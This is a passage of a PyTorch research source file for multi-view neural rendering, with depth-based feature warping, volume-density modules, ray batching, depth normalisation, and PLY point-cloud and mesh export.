predicted_depths = \\\n visuals['rgbs'], visuals['_r_depths'], visuals['masks'], \\\n visuals['target_rgbs'], visuals['target_depths'], visuals['target_masks'], \\\n visuals['_rgbs'], visuals['_depths'];\n \n # inputs resize, only when resolution 1K.\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_depths = F.interpolate(input_depths, (opts.img_size,opts.img_size), mode='nearest')\n input_depths = input_depths.view(-1, opts.num_views, 1, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n target_depths = target_depths.view(-1, 1, opts.img_size, opts.img_size)\n target_masks = target_masks.view(-1, 1, opts.img_size, opts.img_size) # [B,1,H,W]\n \n predicted_rgbs = predicted_rgbs.view(-1, opts.load_size * opts.load_size, 4, 3).view(-1, opts.load_size * opts.load_size, 12).permute(0,2,1) # [B*Nv, 12, N_p]\n predicted_rgbs = predicted_rgbs[:,[0,3,6,9,1,4,7,10,2,5,8,11]]\n # predicted_rgbs = predicted_rgbs.reshape(-1, opts.load_size, opts.load_size, 2, 2, 3)\n # predicted_rgbs = predicted_rgbs.view(-1, opts.load_size * opts.load_size, 4, 3)\n predicted_rgbs = F.fold(predicted_rgbs, (opts.img_size, opts.img_size), (2,2), stride=2).permute(0,2,3,1) # [b*n_v,3,h,w]\n predicted_rgbs = torch.clamp(predicted_rgbs, 0, 1) # [1, 3, H, W];\n # target_rgbs : [1, 3, H, W];\n \n predicted_depths = predicted_depths.view(-1, 1, opts.load_size, 
opts.load_size);\n predicted_depths = F.interpolate(predicted_depths, (opts.img_size,opts.img_size), mode='nearest')\n \n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths, opts.valid_depth_min, opts.valid_depth_max)\n # the predicted depths normalization:\n # predicted_depths = (predicted_depths - opts.z_size) / opts.z_bbox_len * target_masks[:,0];\n # predicted_depths = (predicted_depths - opts.z_size) / opts.z_bbox_len;\n # input_depths,[B,N,1,H,W]\n input_depths, _, _, _ = _depth_normalizer(input_depths[:, :, 0], opts.valid_depth_min, opts.valid_depth_max)\n # normalize the target depths.\n target_depths, _, _, _ = _depth_normalizer(target_depths, opts.valid_depth_min, opts.valid_depth_max)\n \n predicted_rgbs_ = predicted_rgbs[0].detach().cpu().numpy() * 255.0 # [H,W,3]\n predicted_depths_ = predicted_depths[0,0].detach().cpu().numpy()\n target_masks = target_masks[0,0].detach().cpu().numpy() # [H,W]\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n _input_depth = input_depths[0,i].detach().cpu().numpy() # [H,W]\n _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( _input_depth * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n predicted_depths_ = np.clip( (predicted_depths_ + 1)*0.5, 0, 1)\n predicted_depths_ = np.stack([predicted_depths_]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n\n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, _target_depths, predicted_depths_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n\n # PSNR values;\n psnr = cal_psnr( predicted_rgbs_, _target_rgbs, target_masks, in_masks=False ) # target_rgbs & target_rgbs are weighted by masks\n psnr = round(psnr, 2)\n # Image.fromarray( rgbs.astype(np.uint8) ).save(save_path_rgb)\n # Image.fromarray( _rgbs.astype(np.uint8) ).save(save_path_rgb_)\n # cv2.imwrite( save_path_depth, depths.astype(np.uint16) )\n # cv2.imwrite( save_path_depth_, _depths.astype(np.uint16) )\n save_path_rgb = os.path.join( image_dir, 'rgb_{}_rank{}_epoch{}_idx{}_psnr_{}.jpg'.format(subject_name, local_rank, epoch, idx, psnr) )\n\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n \ndef save_rgb_depths(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n save_path_rgb = os.path.join(image_dir, 'rgb_{}_rank{}_epoch{}_idx{}.jpg'.format(subject_name, local_rank, 
epoch, idx))\n\n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, input_depths, input_masks, \\\n target_rgbs, target_depths, target_masks, \\\n predicted_rgbs, predicted_depths, input_normals = \\\n visuals['rgbs'], visuals['_r_depths'], visuals['masks'], \\\n visuals['target_rgbs'], visuals['target_depths'], visuals['target_masks'], \\\n visuals['_rgbs'], visuals['_depths'], visuals['_r_normals'];\n \n # inputs resize, only when resolution 1K.\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_normals = input_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n target_depths = target_depths.view(-1, 1, opts.img_size, opts.img_size)\n \n predicted_rgbs = predicted_rgbs.view(-1, opts.img_size, opts.img_size, 3)\n predicted_depths = predicted_depths.view(-1, 1, opts.load_size, opts.load_size);\n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths, opts.valid_depth_min, opts.valid_depth_max)\n # input_depths,[B,N,1,H,W]\n # normalize the target depths.\n target_depths, _, _, _ = _depth_normalizer(target_depths, opts.valid_depth_min, opts.valid_depth_max)\n \n predicted_rgbs_ = predicted_rgbs[0].detach().cpu().numpy() * 255.0\n predicted_depths_ = predicted_depths[0,0].detach().cpu().numpy()\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n # _depths.append( _input_depth * 255.0 )\n _depths.append( input_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n predicted_depths_ = np.clip( (predicted_depths_ + 1)*0.5, 0, 1)\n predicted_depths_ = np.stack([predicted_depths_]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n\n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, _target_depths, predicted_depths_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n \n # Image.fromarray( rgbs.astype(np.uint8) ).save(save_path_rgb)\n # Image.fromarray( _rgbs.astype(np.uint8) ).save(save_path_rgb_)\n # cv2.imwrite( save_path_depth, depths.astype(np.uint16) )\n # cv2.imwrite( save_path_depth_, _depths.astype(np.uint16) )\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n\n# e.g., get features from other four neighborviews\ndef warp_func(o_d, t_d, o_k, o_rt, t_ks, t_rts, t_feats, get_im=False, d_thresh=0.01, warp_d_thresh=0.03):\n # o_d : [B*1, 1, H, W], o_k(rt): [B*1, 3, 3(4)]\n # t_d : 
[B*N_nei, 1, H, W], t_feats : [B*N_nei, 3, HH, WW]\n # given source depth and k,rt matrix, warp target features given target k & rt matrix.\n # print(o_d.shape, t_d.shape, o_k.shape, t_ks.shape, t_feats.shape)\n B, _, H, W = o_d.shape # target depth only contain one view.\n HH, WW = t_feats.shape[-2:]\n num_neighbors_views = t_d.shape[0] // B\n \n ys, xs = torch.meshgrid( torch.arange(0, H, device=o_d.device, dtype=o_d.dtype), # [H, W]\n torch.arange(0, W, device=o_d.device, dtype=o_d.dtype) )\n ys, xs = ys.reshape(-1), xs.reshape(-1) # [h*w]\n # transform to the camera coordinate.\n xyz = torch.stack( [xs, ys, torch.ones_like(xs)], dim=0 ) # [3, H*W]\n xyz = xyz.view(1,3,-1).repeat(B,1,1) # [B,3,H*W]\n XYZ = (torch.inverse(o_k) @ xyz) * o_d.view(B,1,-1) # [B,3,H*W] * [B,1,H*W] -> [B,3,H*W]\n # transform to world positions, if depth is 0 he re, the returned pos is the camera's position.\n XYZ = torch.inverse(o_rt[:,:3,:3]) @ (XYZ - o_rt[:,:3,-1:]) # [B,3,3] * [B,3,H*W] -> [B,3,H*W]\n XYZ_ = XYZ.view(B,1,3,-1).repeat(1,num_neighbors_views,1,1).view(-1,3,H*W) # [B*N_v,3,H*W]\n # project to other views.\n xyz_t = t_rts[...,:3] @ XYZ_ + t_rts[...,-1:] # [B*N_v,3,H*W]\n p_d = xyz_t[:,-1:,:].clone() # [B*N_v, 1, H*W]\n # set the invalid depth to -1.\n invalid = p_d <= d_thresh # [B*N_v, 1, H*W]\n p_d_ori = p_d.clone() # original depths.\n p_d[invalid] = 1\n \n xyz_t /= p_d # [x / d, y / d, 1.];\n pts_screen = t_ks @ xyz_t # [B*Nv, 3, h*w]\n # transform to [-1,1], unvalid regions are masked as -2;\n grids = (pts_screen[:,:2] - H // 2) / (H // 2) # [-1, 1] [B*Nv, 2, h*w], H==W here\n grids[invalid.repeat(1,2,1)] = -1\n grids = grids.permute(0,2,1)[:,:,None] # [B*Nv, h*w,1,2]\n \n # get visible masks.\n # step0. get the target depth values\n t_d_warp = F.grid_sample(t_d, grids, mode='nearest', align_corners=True)[..., 0] # [b*Nv, 1, h*w]\n in_visi_labels = (t_d_warp - p_d_ori).abs() > warp_d_thresh # [B*N_v, 1, H * W]\n grids[in_visi_labels.permute(0, 2, 1)] = -1 # mark the invisible regions as -2;\n grids_maps = grids[:,:,0].permute(0,2,1).view(-1,2,H,W) # [B*Nv, 2, h, w]\n grids_maps = F.interpolate(grids_maps, (HH, WW), mode='bilinear') # [B*Nv, 2, h, w]\n \n if get_im:\n grids = grids_maps.view(B*num_neighbors_views, 2, -1).permute(0,2,1)[:,:,None]\n # the warpped features, all regions are valid now, then warpping.\n t_feats = torch.cat( [t_feats, torch.ones_like(t_feats[:,:1,...])], dim=1 )\n warped_feats = F.grid_sample(t_feats, grids, mode='bilinear', align_corners=True)[..., 0] # [B*Nv, c, h*w]\n warped_feats = warped_feats.view(t_ks.shape[0], -1, HH, WW) # B*Nnei, C+1. 
H, W\n mask = warped_feats[:, -1:].clone() # valid regions.\n warped_feats = warped_feats[:, :-1] * mask\n return grids_maps, warped_feats\n \n # cv2.imwrite( './visi_mask.png', ( (1 - in_visi_labels.view(-1, 1, H, W).int()[0,0].detach().cpu().numpy()) * 255).astype(np.uint8) )\n # cv2.imwrite( './warped_feats.png', ( warped_feats[0].permute(1,2,0).detach().cpu().numpy() * 255).astype(np.uint8)[..., ::-1] )\n # exit()\n # return warped_feats, t_d_ori.view(-1, 1, H, W), in_visi_labels.view(-1, 1, H, W).int(), grids # [B*Nv, h*w, 1, 2]\n return grids_maps\n\n\ndef warp_func_features( feats, grids, B, Nv ):\n _,C,H,W = feats.shape\n grids_ = grids.view(B*Nv, 2, -1).permute(0,2,1)[:,:,None] # [BNv,h*w,1,2]\n t_feats = torch.cat( [feats, torch.ones_like(feats[:,:1,...])], dim=1 )\n warped_feats = F.grid_sample(t_feats, grids_, mode='bilinear', align_corners=True)[..., 0] # [B*Nv, c+1, h*w]\n warped_feats = warped_feats.view(B*Nv, -1, H, W) # B*Nv, C+1. H, W\n mask = warped_feats[:, -1:].clone() # valid regions.\n warped_feats = warped_feats[:, :-1] * mask\n return warped_feats\n\ndef proj_persp(points, K, R, T, p_depths, n_views, depth_thres=0.01, min_d=0.1, max_d=4.0, res=512):\n # points: [B, 3, N_point]\n # p_depths: [B, 1, N_point]\n if p_depths is not None:\n invalid_d = (p_depths < min_d) | (p_depths > max_d) # [B', 1, N_point]\n points = points[:, None].repeat(1, n_views, 1, 1).view(-1, *points.shape[-2:])\n \n pts = R @ points + T # [B*N_v, 3, N]\n # To screen coordinate\n ori_pts = pts.clone() # [B*N_v, 3, N]\n depth = pts[:, -1:, :].clone() # [B*N_v, 1, N]\n invalid = depth < depth_thres # invalid depth values.\n depth_ = depth.clone() # get depth values.\n depth_[invalid] = 1 # assign with 1, don't divide by this depth value.\n \n if p_depths is not None:\n invalid_d = invalid_d[:, None].repeat(1, n_views, 1, 1).view(-1, 1, invalid_d.shape[-1]) # [BNv, 1, N_rays]\n depth[invalid_d] = -2\n \n pts /= depth_ # [x / d, y / d, 1.];\n pts_screen = K @ pts # [f1 * x / d + f_x, f2 * y / d + f_y]\n pts_screen = pts_screen[:, :2, :] # [B, 2, N_p]\n # in dataset, the intrinsic matrix has been normalized to [f1 / fx, f2 / fy, 1], -> [-1,1]\n grids = (pts_screen - res // 2) / (res // 2) # to [-1,1] [B, 2, N]\n # invalid_ = invalid.repeat(1,2,1)[..., None].repeat(1,1,1,4).view(-1, 2, grids.shape[-1])\n grids[invalid.repeat(1,2,1)] = -2 # invalid with -1.\n if p_depths is not None:\n grids[invalid_d.repeat(1,2,1)] = -2;\n \n return ori_pts, grids, depth\n\n\n# density properties: beta_init, beta_min;\nclass Density(nn.Module):\n def __init__(self, params_init={}):\n super().__init__()\n for p in params_init:\n param = nn.Parameter(torch.tensor(params_init[p]))\n setattr(self, p, param)\n\n def forward(self, sdf, beta=None):\n return self.density_func(sdf, beta=beta)\n\n# density\n# {\n# params_init{\n# beta = 0.1\n# }\n# beta_min = 0.0001\n# }\n\n# density func: alpha * (0.5 + 0.5 * udf)\nclass LaplaceDensity(Density): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, params_init={}, beta_min=0.0001, device='cuda:0'):\n super().__init__(params_init=params_init)\n self.beta_min = torch.tensor(beta_min, device=device)\n\n def density_func(self, sdf, beta=None):\n # sdf = 1/beta * ();\n if beta is None:\n beta = self.get_beta()\n\n alpha = 1 / beta\n return alpha * (0.5 + 0.5 * sdf.sign() * torch.expm1(-sdf.abs() / beta))\n\n def get_beta(self):\n beta = self.beta.abs() + self.beta_min\n return beta\n \n# my density func, regard as a smooth function for volume rendering.\nclass 
MyLaplaceDensity(nn.Module): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, opts, device='cuda:0'):\n super(MyLaplaceDensity, self).__init__()\n self.register_parameter( 'beta', nn.Parameter(torch.tensor(opts.beta_init)) ) # default as 0\n self.beta_min = torch.tensor(opts.beta_min, device=device) # default as 1 / 10000.0\n # self.beta_max = torch.tensor(opts.beta_max, device=device) # default as 1 / 1000.0\n\n def density_func(self, occ, beta=None):\n # transform occ to robust sdf.\n # inside : -0.5, outside 0.5;\n \n _sdf = occ - 0.5 # [-0.5, +0.5]\n if beta is None:\n beta = self.get_beta() # the beta, such as 0.01\n\n alpha = 1 / beta # alpha <= 1/ beta; the default alpha can be set as 100 as max alpha;\n # for sdf <= 0, density = 0.5 * exp( sdf / beta ) / beta;\n # for sdf > 0, density = (1 - 0.5 * exp( - sdf / beta )) / beta;\n # 0.5 - 0.5 * (exp(-sdf/beta) - 1) -> 1 - 0.5 * exp( - sdf / beta ); ( >0);\n # 0.5 + 0.5 * (exp(sdf / beta) - 1) -> 0.5 * exp( sdf / beta ); ( <= 0)\n return alpha * (0.5 - 0.5 * _sdf.sign() * torch.expm1(-_sdf.abs() / beta))\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_beta(self):\n # limit the beta. [0.0001, 0.001];\n beta = self.beta_min + self.beta.abs()\n return beta\n \n# occ to density functions.\nclass OccDensity(nn.Module): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, opts, device='cuda:0'):\n super(OccDensity, self).__init__()\n self.register_parameter( 'beta', nn.Parameter(torch.tensor(opts.beta_init)) ) # default as 0.1\n self.beta_min = torch.tensor(opts.beta_min, device=device) # default as 0.0001\n\n def density_func(self, occ, beta=None):\n if beta is None:\n beta = self.get_beta()\n\n # alpha = 1 / beta, the density = alpha * occ\n return occ / beta\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_beta(self):\n beta = self.beta.abs() + self.beta_min\n return beta\n \n\nclass TempGrad(object):\n \n def __enter__(self):\n self.prev = torch.is_grad_enabled() # get previous gradients.\n torch.set_grad_enabled(True) # temp gradient enable.\n \n def __exit__(self, exc_type, exc_value, traceback):\n torch.set_grad_enabled(self.prev) # recover the previous states for gradients.\n\n\n# when UDF -> 0, the density -> +inf;\nclass LogisticDensity(nn.Module): # density value: s * e^{-s*udf} / (1+e^{-s*udf})^2\n \n def __init__(self, opts, device):\n super(LogisticDensity, self).__init__()\n # the paramter is initialized with 0.01, reload model will update the s.\n self.register_parameter('s', nn.Parameter(torch.tensor(opts.s_init)) )\n self.s_min = torch.tensor(opts.s_min, device=device)\n \n def density_func(self, udf):\n s = self.get_s()\n # print('s_min:', self.s_min.cpu(), ', s_now:', self.s.cpu())\n # during training, the s gradually becomes larger.\n return s * torch.exp(-s*udf) / (1 + torch.exp(-s*udf))**2\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_s(self):\n s = self.s_min + self.s.abs()\n return s\n\n\n# 1. the batchify rays volume rendering functions.\n@torch.no_grad()\ndef generate_rays(ks, rs, ts, res, masks=None, body_bbox=None, num_sampled_rays=1024, in_patch=False, in_bbox=False, device='cuda:0'):\n \n if num_sampled_rays is None: # when inference, get all rays for sampling.\n gpu_id = int(str(device).split(':')[-1]) # 0 or 1\n # sampled rays. 
[B, N_v, H, W, 6]\n ray_ori_dir = VoxelEncoding.rays_calculating(ks, rs, ts, res, gpu_id) # ~0.5ms\n ray_ori_dir = ray_ori_dir.view(ks.shape[0], -1, ray_ori_dir.shape[-1]) # [B, -1, 6]\n return ray_ori_dir, None # no need for xy.\n \n # sampling rays inside the masks, and sampling indeed num_rays. ~ 2ms.\n sampled_rays, sampled_xy = ray_sampling(ks, rs, ts, res, num_sampled_rays, masks, in_patch, in_bbox, body_bbox)\n sampled_rays = sampled_rays.view(sampled_rays.shape[0], -1, 6) # [B, N_rays, 6]\n \n return sampled_rays, sampled_xy\n\n\n@torch.no_grad()\ndef batchify_rays(batch_rays, num_sampled_rays, target_num_views):\n # batch_rays: [B, N_rays, 6]\n batch_rays_batchified = []\n num_total_rays = batch_rays.shape[1] # suppose as N_v * H * W;\n num_batch_rays = num_sampled_rays * target_num_views # when inference, num of the target views is 1;\n num_batches = num_total_rays // num_batch_rays; # get the num of rays, may not enough here.\n # _batch_rays = batch_rays.view(batch_rays.shape[0], num_batch_rays, num_batches, 6).permute(2,0,1,3); # [N_b, B, N_rays, 6];\n\n for i in range(num_batches):\n batch_rays_batchified.append( batch_rays[:, i*num_batch_rays:(i+1)*num_batch_rays, ].contiguous() )\n # when the batchied rays are not in sequtial for all rays.\n left_rays = num_total_rays - num_batch_rays * num_batches\n if left_rays > 0:\n batch_rays_batchified.append( batch_rays[:, num_batch_rays*num_batches:, ].contiguous() )\n \n # [[B, N_rays*1, 6], ...]\n # for i in range(num_batches):\n # batch_rays_batchified.append( _batch_rays[i] )\n \n return batch_rays_batchified\n\ndef high_res_rgbs_images_mean(rgbs_fold):\n # rgbs fold data, rgbs_fold : [B, N_v, 12, h, w]\n rgbs_chanel = rgbs_fold.shape[2] // 3\n # get the rgbs mean data in channels.\n rgbs_mean = torch.stack( [rgbs_fold[:,:, :rgbs_chanel].mean(dim=2), \n rgbs_fold[:,:, rgbs_chanel:rgbs_chanel*2].mean(dim=2), \n rgbs_fold[:,:, rgbs_chanel*2:].mean(dim=2)], dim=2 )\n return rgbs_mean\n\n\ndef high_res_rgbs_rays_mean(rgbs_fold):\n # rgbs fold data, rgbs_fold : rays [B, N_rays, 12]\n rgbs_chanel = rgbs_fold.shape[-1] // 3\n # get the rgbs mean data in channels.\n rgbs_mean = torch.stack( [rgbs_fold[..., :rgbs_chanel].mean(dim=-1), \n rgbs_fold[..., rgbs_chanel:rgbs_chanel*2].mean(dim=-1), \n rgbs_fold[..., rgbs_chanel*2:].mean(dim=-1)], dim=-1 )\n return rgbs_mean\n\n\ndef l2_normalize(x):\n # x : [..., 3].\n normalized_x = x / ( x.norm(2, dim=-1).unsqueeze(-1) + 1e-5 )\n return normalized_x\n\n# 2. normalizer or other properties.\ndef rgb_normalizer(rgb_tensors, mask_tensors, mid=0.5, dist=0.5):\n # rgbs: [B, 3, H, W]; masks : [B, 1, H, W];\n tmp = (rgb_tensors - mid) / dist; # [-1, 1], rgb normalization.\n tmp *= mask_tensors # mask the back ground to 0.\n return tmp\n\ndef depth_normalizer(depth_tensors, mid, dist):\n # depth tensors: [B, N_v, N_rays, N_sampled, 1]\n # mid, dist : [B, N_v, ....]\n # step 1. 
expanding.\n if len(depth_tensors.shape) == 5:\n mid = mid[..., None];\n mid_expand = mid.expand_as(depth_tensors)\n if type(dist) == torch.Tensor:\n dist = dist[..., None]; # [B, N_v, 1, 1, 1]\n assert len(depth_tensors.shape) == len(mid.shape) == len(dist.shape), \"unsupported invalid shape.\"\n dist_expand = dist.expand_as(depth_tensors)\n return (depth_tensors - mid_expand) / (dist_expand / 2.0)\n else:\n return (depth_tensors - mid_expand) / dist # the dist is float value.\n \n else: # [B*N_v, N_p, 1]\n b, n_v = mid.shape[:2]\n depth_tensors = depth_tensors.view(b, n_v, -1, 1)\n mid_expand = mid.expand_as(depth_tensors)\n if type(dist) == torch.Tensor:\n dist_expand = dist.expand_as(depth_tensors)\n depth_normalized = (depth_tensors - mid_expand) / (dist_expand / 2.0)\n else:\n depth_normalized = (depth_tensors - mid_expand) / dist\n \n # reshape to [BN_v, N_points, 1]\n depth_normalized = depth_normalized.view(b*n_v, -1, 1)\n return depth_normalized\n\ndef normalize_rgbd(rgbs, depths, depth_normalizer):\n rgb_mean = torch.Tensor((0.485, 0.456, 0.406)).view(1, 3, 1, 1)\n rgb_std = torch.Tensor((0.229, 0.224, 0.225)).view(1, 3, 1, 1)\n \n depths_normalized, _, depth_mid, depth_dist = depth_normalizer( depths ) # to [-0.5, 0.5]\n rgbs_normalized = (rgbs - rgb_mean.type_as(rgbs)) / rgb_std.type_as(rgbs) # standard normalization.\n return depths_normalized, depth_mid, depth_dist, rgbs_normalized\n\n\ndef unnormalize_depth(depths, mids, dists):\n b,c,h,w = depths.shape\n mids_ = mids.view(-1); \n dists_ = dists.view(-1);\n depths_un = depths.clone()\n # unormalize-depths, the encoder -> (d - mids) / (dists / 2.0)\n for i in range(b):\n depths_un[i] = depths[i] * dists_[i] + mids_[i] # d_un = d' * (dists / 2.0) + mids.\n \n return depths_un\n\ndef z_normalizer(z, mid, dist):\n b, n_v = mid.shape[:2]\n z = z.view(b, n_v, -1, 1)\n mid_expand = mid.expand_as(z)\n dist_expand = dist.expand_as(z)\n z_normalized = (z - mid_expand) / (dist_expand / 2.0)\n z_normalized = z_normalized.view(b*n_v, -1, 1)\n return z_normalized\n\n\nclass _trunc_exp(Function):\n @staticmethod\n @custom_fwd(cast_inputs=torch.float32) # cast to float32\n def forward(ctx, x):\n ctx.save_for_backward(x)\n return torch.exp(x)\n\n @staticmethod\n @custom_bwd\n def backward(ctx, g):\n x = ctx.saved_tensors[0]\n return g * torch.exp(x.clamp(-15, 15))\n\n\ntrunc_exp = _trunc_exp.apply\n\n\n### other funcs:\ndef to_pcd_mesh(tsdf_vol, color_vol, bbox, voxel_size):\n tsdf = tsdf_vol[0].cpu().numpy()\n color = color_vol[0].cpu().numpy()\n vol_bbox = bbox[0, :, 0].cpu().numpy()\n voxel_size = voxel_size[0, 0].cpu().numpy() # the voxel's size;\n pc = get_point_cloud(tsdf, color, vol_bbox, voxel_size)\n verts, faces, norms, colors = get_mesh(tsdf, color, vol_bbox, voxel_size)\n pcwrite('./pc_all0.ply', pc)\n meshwrite('./mesh_all0.ply', verts, faces, norms, colors)\n\ndef get_point_cloud(tsdf_vol, color_vol, vol_bbox, voxel_size):\n \"\"\"Extract a point cloud from the voxel volume.\n \"\"\"\n from skimage import measure\n\n # Marching cubes\n verts = measure.marching_cubes_lewiner(tsdf_vol, level=0)[0] # verts is float values.\n verts_ind = np.round(verts).astype(int)\n verts = verts * voxel_size + vol_bbox\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:, 0], verts_ind[:, 1], verts_ind[:, 2]]\n colors_b = np.floor( rgb_vals / 256 )\n colors_g = np.floor((rgb_vals - colors_b * 256) / 256)\n colors_r = rgb_vals - colors_b*256 - colors_g*256\n colors = np.floor(np.asarray([colors_b, colors_g, colors_r])).T\n colors = 
colors.astype(np.uint8)\n\n pc = np.hstack([verts, colors])\n return pc\n\ndef get_mesh(tsdf_vol, color_vol, vol_bbox, voxel_size):\n \"\"\"Compute a mesh from the voxel volume using marching cubes.\n \"\"\"\n from skimage import measure\n\n # Marching cubes\n verts, faces, norms, vals = measure.marching_cubes_lewiner(tsdf_vol, level=0)\n verts_ind = np.round(verts).astype(int)\n verts = verts * voxel_size + vol_bbox\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:,0], verts_ind[:,1], verts_ind[:,2]]\n colors_b = np.floor(rgb_vals/256)\n colors_g = np.floor((rgb_vals-colors_b*256)/256)\n colors_r = rgb_vals-colors_b*256-colors_g*256\n colors = np.floor(np.asarray([colors_r,colors_g,colors_b])).T\n colors = colors.astype(np.uint8)\n \n return verts, faces, norms, colors\n\ndef pcwrite(filename, xyzrgb):\n \"\"\"Save a point cloud to a polygon .ply file.\n \"\"\"\n xyz = xyzrgb[:, :3]\n rgb = xyzrgb[:, 3:].astype(np.uint8)\n\n # Write header\n ply_file = open(filename,'w')\n ply_file.write(\"ply\\n\")\n ply_file.write(\"format ascii 1.0\\n\")\n ply_file.write(\"element vertex %d\\n\"%(xyz.shape[0]))\n ply_file.write(\"property float x\\n\")\n ply_file.write(\"property float y\\n\")\n ply_file.write(\"property float z\\n\")\n ply_file.write(\"property uchar red\\n\")\n ply_file.write(\"property uchar green\\n\")\n ply_file.write(\"property uchar blue\\n\")\n ply_file.write(\"end_header\\n\")\n\n # Write vertex list\n for i in range(xyz.shape[0]):\n ply_file.write(\"%f %f %f %d %d %d\\n\"%(\n xyz[i, 0], xyz[i, 1], xyz[i, 2],\n rgb[i, 0], rgb[i, 1], rgb[i, 2],\n ))\n \ndef meshwrite(filename, verts, faces, norms, colors):\n \"\"\"Save a 3D mesh to a polygon .ply file.\n \"\"\"\n # Write header\n ply_file = open(filename,'w')\n ply_file.write(\"ply\\n\")\n ply_file.write(\"format ascii 1.0\\n\")\n ply_file.write(\"element vertex %d\\n\"%(verts.shape[0]))\n ply_file.write(\"property float x\\n\")\n ply_file.write(\"property float y\\n\")\n ply_file.write(\"property float z\\n\")\n ply_file.write(\"property float nx\\n\")\n ply_file.write(\"property float ny\\n\")\n ply_file.write(\"property float nz\\n\")\n ply_file.write(\"property uchar red\\n\")\n ply_file.write(\"property uchar green\\n\")\n ply_file.write(\"property uchar blue\\n\")\n ply_file.write(\"element face %d\\n\"%(faces.shape[0]))\n ply_file.write(\"property list uchar int vertex_index\\n\")\n ply_file.write(\"end_header\\n\")\n\n # Write vertex list\n for i in range(verts.shape[0]):\n ply_file.write(\"%f %f %f %f %f %f %d %d %d\\n\"%(\n verts[i,0], verts[i,1], verts[i,2],\n norms[i,0], norms[i,1], norms[i,2],\n colors[i,0], colors[i,1], colors[i,2],\n ))\n\n # Write face list\n for i in range(faces.shape[0]):\n ply_file.write(\"3 %d %d %d\\n\"%(faces[i,0], faces[i,1], faces[i,2]))\n\n ply_file.close()\n\ndef draw_octree_nodes(nodes, indexs, _ray_ori, _ray_dir, sampled_depths, _idx, _sampled_idx):\n import open3d as o3d\n mesh_all = []\n # print(indexs, nodes.shape)\n # exit()\n\n # nodes0 = nodes[:indexs[3]].cpu().numpy() # [3, N]\n # nodes0 = nodes[indexs[1]:indexs[2]].cpu().numpy() # [3, N]\n # nodes0 = nodes[indexs[0]:indexs[1]].cpu().numpy() #[3, N]\n nodes0 = nodes[:].cpu().numpy() # [3, N]\n # nodes0 = 